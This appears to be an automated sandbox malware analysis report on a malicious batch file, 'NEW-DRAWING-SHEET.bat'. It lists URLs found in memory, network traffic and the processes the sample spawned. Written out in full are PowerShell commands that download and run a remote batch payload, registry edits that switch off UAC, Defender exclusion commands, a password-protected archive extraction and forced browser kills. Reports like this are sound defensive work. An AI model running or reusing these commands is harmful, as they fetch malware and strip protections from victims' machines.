          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E3AD000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: qmgr.db.17.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DB9C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.fo
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
          Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
          Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
          Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
          Source: edb.log.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
          Source: powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DB9BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.fo
          Source: powershell.exe, 00000004.00000002.1741498822.00000218D8804000.00000004.00000020.00020000.00000000.sdmp, NEW-DRAWING-SHEET.batString found in binary or memory: https://paste.fo/raw/a1af5a4d0301
          Source: NEW-DRAWING-SHEET.batString found in binary or memory: https://raw.githubuserc
          Source: NEW-DRAWING-SHEET.batString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe&
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownHTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.4:49730 version: TLS 1.2

          System Summary

          barindex
          Drops password protected ZIP file
          Source: DOC.zip.crdownload.11.drZip Entry: encrypted
          Source: chromecache_113.23.drZip Entry: encrypted
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Program Files\7-Zip\7z.exeProcess token adjusted: Security
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: classification engineClassification label: mal100.evad.winBAT@93/40@5/6
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\ae802c9a-b519-4f5d-a10e-e9bb8606f864.tmpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\StartupJump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
          Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iexplore.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "safari.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epic.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tor.exe")
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CMD.exe")
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: NEW-DRAWING-SHEET.batVirustotal: Detection: 34%
          Source: NEW-DRAWING-SHEET.batReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zipJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
